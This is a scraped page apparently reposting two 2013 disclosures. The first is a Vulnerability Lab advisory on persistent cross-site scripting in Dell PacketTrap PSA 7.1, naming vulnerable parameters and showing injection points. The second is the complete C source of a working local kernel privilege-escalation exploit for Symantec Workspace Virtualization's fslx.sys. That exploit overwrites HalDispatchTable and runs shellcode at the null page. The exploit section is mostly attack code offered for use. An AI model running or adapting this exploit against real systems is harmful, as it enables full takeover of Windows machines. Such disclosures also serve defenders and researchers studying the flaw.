[Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com Sursa: Dell PacketTrap MSP RMM 6.6.x - Multiple XSS Vulnerabilities

Dell PacketTrap PSA 7.1 - Multiple XSS Vulnerabilities Title: ====== Dell PacketTrap PSA 7.1 - Multiple Persistent Vulnerabilities Date: ===== 2013-07-18 References: =========== http://www.vulnerability-lab.com/get_content.php?id=790 VL-ID: ===== 790 Common Vulnerability Scoring System: ==================================== 5.6 Introduction: ============= Purpose built for IT professionals and other service businesses. Streamline the management of projects, clients, staff, assets, and billing. Software should be intuitive and easy-to-use, not complicated and confusing. That`s why packetTrap has created an easy to use yet powerful interface that even your techs enjoy using. Whether you are using spreadsheets and sticky notes or clunky software, companies like yours will surely benefit from the significant time savings and a dramatic increase in profitability. With packetTrap PSA, you now have an integrated solution that delivers an end-to-end business management solution with real advantages over other options. Service Request Tracking - Team Scheduling - Customer and Contact Management - Customer Portal - Mobile Friendly - QuickBooks Integration Equipment Tracking Contract Management - Email Dropbox - SSL Security. (Copy of the Vendor Homepage: http://www.packettrap.com/ ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the DELL packetTrap PSA v7.1 web application. Report-Timeline: ================ 2013-01-24: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed) 2013-02-06: Vendor Notification (Dell Security Team) 2013-02-08: Vendor Response/Feedback (Dell Security Team) 2013-**-**: Vendor Fix/Patch (Developer Team) 2013-07-18: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== DELL Product: PacketTrap PSA 7.1 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== Multiple persistent input validation vulnerabilities are detected in the DELL packetTrap PSA v7.1 web application. The bug allows remote attackers to implement/inject own malicious script code on the application side of the system (persistent). Exploitation of persistent issues mostly requires a low privilege application user account and an user interaction click or input. The 1st persistent web vulnerability is located in the contracts module when processing to request a via POST method manipulated txtContractName parameter. The vulnerability allows remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the contract module when processing to display (list) the context (output). The result is the persistent execution of script code in the contract overview listing. The 2nd persistent web vulnerability is located in the Equipment Item module when processing to request a via POST method manipulated lblPurchaseInfo parameter. The vulnerability allows remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the Equipment Item module when processing to display (list) the context (output). The result is the persistent execution of script code in the Equipment Item listing. The 3rd persistent web vulnerability is located in the Import Customer Equipment Records module when processing to request a via POST method manipulated gridItem parameter. The vulnerability allows remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the Import Customer Equipment Records module when processing to display (list) the context (output). The result is the persistent execution of script code in the Import Customer Equipment Records listing. The 4th part of the persistent web vulnerabilities are located in the Labor Rate module when processing to request via POST method manipulated lblItemNo, lblDescription, lblAccountName & lblNotes parameters. The vulnerabilities allow remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the Labor Rate module when processing to display (list) the context (output). The result is the persistent execution of script code in the Labor Rate listing. The 5th part of the persistent web vulnerabilities are located in the Materials Item module when processing to request via POST method manipulated lblMfrName, lblMfrItemNo, lblMfrDescription, lblAccountName & lblNotes parameters. The vulnerabilities allow remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the Materials Item module when processing to display (list) the context (output). The result is the persistent execution of script code in the Materials Item listing. The 6th part of the persistent web vulnerabilities are located in the New customer module when processing to request via POST method manipulated lblPrimaryContact & lblPrimaryLocation parameters. The vulnerabilities allow remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the New customer module when processing to display (list) the context (output). The result is the persistent execution of script code in the New customer listing. The 7th persistent web vulnerability is located in the Report module when processing to request a via POST method manipulated lblPageTitle parameter. The vulnerability allows remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the Report module when processing to display (list) the context (output). The result is the persistent execution of script code in the Report overview listing. Exploitation of the vulnerability requires a low privilege web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking (manager/admin) with persistent vector, persistent phishing, persistent external redirects to malware, exploits or scripts and persistent manipulation of module context. Vulnerable Module(s): [+] Contract - PacketTrap PSA [+] Equipment Item - PacketTrap PSA [+] Import Customer Equipment Records - PacketTrap PSA [+] Labor Rate - PacketTrap PSA [+] Materials Item - PacketTrap PSA [+] New customer - PacketTrap PSA [+] Report x ApplicationName - PacketTrap PSA Vulnerable Parameter(s): [+] txtContractName [+] lblPurchaseInfo [+] gridItem [+] lblItemNo, lblDescription, lblAccountName & lblNotes [+] lblMfrName, lblMfrItemNo, lblMfrDescription, lblAccountName & lblNotes [+] lblPrimaryContact & lblPrimaryLocation [+] lblPageTitle Affected Section(s): [+] Contract Overview & Edit - Listing [+] Equipment Item Overview & Edit - Listing [+] Import Customer Equipment Records Overview - Listing [+] Labor Rate Details - Listing [+] Materials Item Overview - Listing [+] New customer Account Details - Listing [+] Report - Listing Proof of Concept: ================= The persistent script code inject vulnerabilities can be exploited by low privileged group user accounts with low required user interaction. For demonstration or reproduce ... Review: Contract Overview & Edit - Listing <div class="objectHead"> <h1>Contract: <span id="lblPageTitle">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></h1> <h2><a href="https://vl.packettrappsa.com/customers/customer.aspx?customerId=33628564"><span id="lblCustomerName">Sample Customer</span></a></h2> </div> ... & <td style="width:130px;" class="formLabel">Contract Name:</td> <td style="width:auto;"> <span id="txtContractName">"><[PERSISTENT INJECTED SCRIPT CODE!]></span> </td> </tr> Review: Equipment Item Overview & Edit - Listing <td class="formLabel"> Purchase Info.: </td> <td> <span id="lblPurchaseInfo">Purchased on Dec 11, 2012 from "><[PERSISTENT INJECTED SCRIPT CODE!]></span> </td> </tr> Review: Import Customer Equipment Records Overview - Listing </tr><tr class="gridItem" valign="top"> <td><!--?php</td--> </td></tr><tr class="gridItem" valign="top"> <td>phpinfo();</td> O_O </tr><tr class="gridItem" valign="top"> <td>?></td> </tr><tr class="gridItem" valign="top"> <td>><[PERSISTENT INJECTED SCRIPT CODE!](</td"> </tr> </table> Review: Labor Rate Details - Listing <td class="formLabel"> Name/No.:</td> <td> <span id="lblItemNo">"><[PERSISTENT INJECTED SCRIPT CODE!]></span> </td> </tr> <tr> <td class="formLabel">Description:</td> <td> <span id="lblDescription">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td> </tr> ... & <td class="formLabel">Account Name:</td> <td> <span id="lblAccountName">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td> </tr> Review: Materials Item Overview - Listing <span id="lblItemNo">"><[PERSISTENT INJECTED SCRIPT CODE!]"> </td> </tr> <tr> <td class="formLabel"> Description:</td> <td> <span id="lblDescription">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td> </tr> ... & <table border="0" cellpadding="4" cellspacing="0" width="100%"> <tbody><tr> <td colspan="2"> <hr></td> </tr> <tr> <td style="width:130px;" class="formLabel">Manufacturer:</td> <td style="width:auto;"> <span id="lblMfrName">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td> </tr> <tr><td class="formLabel">Mfr. Item No.:</td> <td> <span id="lblMfrItemNo">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td> </tr> <tr><td class="formLabel">Mfr. Item Desc.:</td> <td> <span id="lblMfrDescription">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td> </tr> ... & <tr><td class="formLabel">Account Name:</td> <td> <span id="lblAccountName">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td> </tr> <tr> <td colspan="2"> <hr></td> </tr> <tr> <td class="formLabel">Id:</td> <td> <span id="lblItemId">33583304</span></td> </tr> <tr> <td class="formLabel">Created:</td> <td> <span id="lblCreated">by the storm on Dec 9, 2012 at 5:11 PM</span></td> </tr> <tr> <td colspan="2"> <hr></td> </tr> <tr> <td class="formLabel">Notes:</td> <td> <span id="lblNotes">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td> </tr> Review: New customer Account Details - Listing <tbody><tr> <td style="width: 130px;"> <strong>Primary Contact:</strong> </td> <td style="width: auto;"> <span id="lblPrimaryContact"><a href="https://vl.packettrappsa.com/customers/contact.aspx?customerId=33628565& contactId=33637457">"><iframe src=http://www. "><iframe src=http://www.</a>, () -, <a href="mailto:"><[PERSISTENT INJECTED SCRIPT CODE!]>">"><[PERSISTENT INJECTED SCRIPT CODE!]></a></span> </td> </tr> <tr> <td> <strong>Primary Location:</strong> </td> <td> <span id="lblPrimaryLocation"><a href="https://vl.packettrappsa.com/customers/location.aspx?customerId=33628565& locationID=33649992">"><[PERSISTENT INJECTED SCRIPT CODE!]</a>, "><[PERSISTENT INJECTED SCRIPT CODE!]> (<a href="https://vl.packettrappsa.com/tools/getMap.aspx?customerLocationId=33649992" class="map-link">Get Map</a>)</span> </td> </tr> </tbody> Review: Report - Listing <div class="ReportHeader"> <h1><span id="lblPageTitle">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></h1> </div> <div class="ReportBody"> <input name="TempSortCol" id="TempSortCol" type="hidden"> <input name="TempSortOrder" id="TempSortOrder" type="hidden"> <div id="ReportParameters" class="ReportParameters2"> <div id="StandardFilters_ReportParameters"> <div class="ParameterGroupHead"> <span class="ui-corner-tr">Time Frame</span> </div> Risk: ===== The security risk of the persistent input validation vulnerabilities are estimated as high(-). Credits: ======== Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [ibrahim@evolution-sec.com] Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [bkm@evolution-sec.com] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright ? 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com Sursa: Dell PacketTrap PSA 7.1 - Multiple XSS Vulnerabilities

Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation # Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit # Date: 2013-7-17 # Author : MJ0011 # Version: Symantec Workspace Virtualization 6.4.1895.0 # Tested on: Windows XP SP3 DETAILS: In fslx.sys 's hook function of "NtQueryValueKey" , it directly write to the buffer of "ResultLength" without any check EXPLOIT CODE: #include "stdafx.h" #include "windows.h" typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; typedef UNICODE_STRING *PUNICODE_STRING; typedef const UNICODE_STRING *PCUNICODE_STRING; typedef LONG (WINAPI *pNtQueryValueKey)( HANDLE KeyHandle, PUNICODE_STRING ValueName, ULONG KeyValueInformationClass, PVOID KeyValueInformation, ULONG Length, PULONG ResultLength ); typedef LONG (WINAPI *pNtQueryIntervalProfile )( ULONG ProfileSource, PULONG Interval ); typedef LONG (WINAPI *pZwQuerySystemInformation) ( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); #include "malloc.h" PVOID GetInfoTable(ULONG ATableType) { ULONG mSize = 0x4000; PVOID mPtr = NULL; LONG status; HMODULE hlib = GetModuleHandle("ntdll.dll"); pZwQuerySystemInformation ZwQuerySystemInformation = (pZwQuerySystemInformation)GetProcAddress(hlib , "ZwQuerySystemInformation"); do { mPtr = malloc(mSize); if (mPtr) { status = ZwQuerySystemInformation(ATableType , mPtr , mSize , 0 ); } else { return NULL; } if (status == 0xc0000004) { free(mPtr); mSize = mSize * 2; } } while (status == 0xc0000004); if (status == 0) { return mPtr; } free(mPtr); return NULL; } enum { SystemModuleInformation = 11, SystemHandleInformation = 16 }; typedef struct { ULONG Unknown1; ULONG Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID); typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID); typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)( ULONG x1, ULONG y1, ULONG x2, ULONG y2, ULONG color ); typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)( ULONG Color ); typedef VOID (*INBV_DISPLAY_STRING_FILTER)( PUCHAR *Str ); typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)( INBV_DISPLAY_STRING_FILTER DisplayStringFilter ); typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)( BOOLEAN bEnable ); typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)( ULONG x1, ULONG y1, ULONG x2, ULONG y2 ); typedef VOID (WINAPI *PINBV_DISPLAY_STRING)( PUCHAR Str ); PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ; PINBV_RESET_DISPLAY InbvResetDisplay = 0 ; PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ; PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ; PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ; PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ; PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ; PINBV_DISPLAY_STRING InbvDisplayString= 0 ; #define VGA_COLOR_BLACK 0 #define VGA_COLOR_RED 1 #define VGA_COLOR_GREEN 2 #define VGA_COLOR_GR 3 #define VGA_COLOR_BULE 4 #define VGA_COLOR_DARK_MEGAENTA 5 #define VGA_COLOR_TURQUOISE 6 #define VGA_COLOR_GRAY 7 #define VGA_COLOR_BRIGHT_GRAY 8 #define VGA_COLOR_BRIGHT_RED 9 #define VGA_COLOR_BRIGHT_GREEN 10 #define VGA_COLOR_BRIGHT_YELLOW 11 #define VGA_COLOR_BRIGHT_BULE 12 #define VGA_COLOR_BRIGHT_PURPLE 13 #define VGA_COLOR_BRIGHT_TURQUOISE 14 #define VGA_COLOR_WHITE 15 UCHAR DisplayString[] = " " " " " " " ---- ===== EXPLOIT SUCCESSFULLY ==== ---- " " " " " " Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit" " " " VULNERABLE PRODUCT " " " " Symantec Workspace Virtualization " " " " " " VULERABLE FILE " " fslx.sys <= 6.4.1895.0 " " " " AUTHOR " " " " MJ0011 " " th_decoder@126.com " " " " 2013-7-17 " " Symantec's technology is hundreds of years behind that of us " " " " "; VOID InbvShellCode() { //DISABLE INTERRUPT __asm { cli } //RESET TO VGA MODE InbvAcquireDisplayOwnership(); InbvResetDisplay(); //FILL FULL SCREEN InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK); //SET TEXT COLOR InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN); InbvInstallDisplayStringFilter(NULL); InbvEnableDisplayString(TRUE); InbvSetScrollRegion( 0 , 0 , 639 ,477); InbvDisplayString(DisplayString); while(TRUE) { }; } BOOL InbvInit(PVOID ntosbase , PSTR ntosname) { HMODULE hlib = LoadLibrary(ntosname); if (hlib == NULL) { return FALSE ; } InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase); InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase); InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase); InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase); InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase); InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase); InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase); InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase); if (InbvAcquireDisplayOwnership && InbvResetDisplay && InbvSolidColorFill && InbvSetTextColor && InbvInstallDisplayStringFilter && InbvEnableDisplayString && InbvSetScrollRegion && InbvDisplayString) { return TRUE ; } return FALSE ; } typedef LONG (WINAPI *PNT_ALLOCATE_VIRTUAL_MEMORY)( HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect ); #define ProfileTotalIssues 2 int main(int argc, char* argv[]) { printf("Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit\n" "fslx.sys <= 6.4.1895.0\n" "\nBy MJ0011\n2013-7-17\nth_decoder@126.com\nPRESS ENTER\n"); getchar(); PSYSTEM_MODULE_INFORMATION pinfo = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation); if (pinfo==0) { printf("cannot get system info\n"); return 0 ; } if (!InbvInit(pinfo->Module[0].Base , strrchr(pinfo->Module[0].ImageName , '\\') + 1)) { printf("cannot init inbv system!\n"); return 0 ; } pNtQueryValueKey NtQueryValueKey = (pNtQueryValueKey)GetProcAddress(GetModuleHandle("ntdll.dll") ,"NtQueryValueKey"); //alloc shellcode jump PNT_ALLOCATE_VIRTUAL_MEMORY NTAllocateVM = (PNT_ALLOCATE_VIRTUAL_MEMORY)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtAllocateVirtualMemory"); PVOID BaseAddress = (PVOID)0x1 ; ULONG dwsize = 0x1000 ; LONG status ; status = NTAllocateVM ( GetCurrentProcess() , &BaseAddress , 0 , &dwsize , MEM_COMMIT | MEM_RESERVE , PAGE_READWRITE ); if (status !=0) { printf("err alloc vm %08x\n", status); getchar(); return 0 ; } //result length always <=0x800 //0~0x800: NOP //0x800: shell code memset((PVOID)0x0 , 0x90 , 0x1000); *(BYTE*)((ULONG)0x800) = 0xe9 ; *(ULONG*)((ULONG)0x801) = (ULONG)InbvShellCode - (ULONG)0x800 - 0x5 ; //get haldispatchtable HMODULE hntos = LoadLibrary(strrchr(pinfo->Module[0].ImageName , '\\')+1); if (hntos == 0 ) { printf("cannot load ntos\n"); getchar(); return 0 ; } PVOID pHalDispatchTable = GetProcAddress(hntos , "HalDispatchTable"); pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable - (ULONG)hntos); pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable + (ULONG)pinfo->Module[0].Base); PVOID xHalQuerySystemInformationAddr = (PVOID)((ULONG)pHalDispatchTable+ sizeof(ULONG)); FreeLibrary(hntos); HKEY hkey ; ULONG err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_READ , &hkey); if (err!=ERROR_SUCCESS) { printf("open key read failed %u\n" ,err); getchar(); return 0 ; } HKEY hkey2 ; err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_WRITE , &hkey2); if (err != ERROR_SUCCESS) { printf("open key write failed %u\n", err); getchar(); return 0 ; } DWORD dd ; err = RegSetValueEx(hkey2 , "123" , 0 , REG_DWORD , (CONST BYTE*)&dd , sizeof(DWORD)); if (err != ERROR_SUCCESS) { printf("set value %u\n" , err); getchar(); return 0 ; } BYTE buffer[100]; PVOID pbuf = buffer ; UNICODE_STRING name ; name.Buffer = NULL ; name.Length = 0 ; name.MaximumLength=0; status = NtQueryValueKey(hkey , &name , 2 , pbuf , 100 , (PULONG)xHalQuerySystemInformationAddr ); //fire our shell code pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryIntervalProfile"); NtQueryIntervalProfile(ProfileTotalIssues , 0 ); return 0; } Sursa: Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation